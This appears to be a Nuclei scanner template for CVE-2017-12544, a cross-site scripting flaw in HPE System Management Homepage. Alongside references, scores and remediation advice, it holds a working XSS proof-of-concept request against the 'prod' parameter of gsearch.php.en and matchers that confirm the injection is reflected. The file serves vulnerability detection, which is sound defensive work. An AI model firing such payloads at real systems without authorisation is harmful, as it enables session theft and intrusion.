id: CVE-2017-12544 info: name: HPE System Management - Cross-Site Scripting author: divya_mudgal severity: medium description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. reference: - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437 - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 - http://www.securitytracker.com/id/1039437 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 epss-percentile: 0.99656 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp product: system_management_homepage tags: cve,cve2017,xss,hp http: - method: GET path: - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//" matchers-condition: and matchers: - type: word part: body words: - "var prodName = '';prompt`document.domain`;//';" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950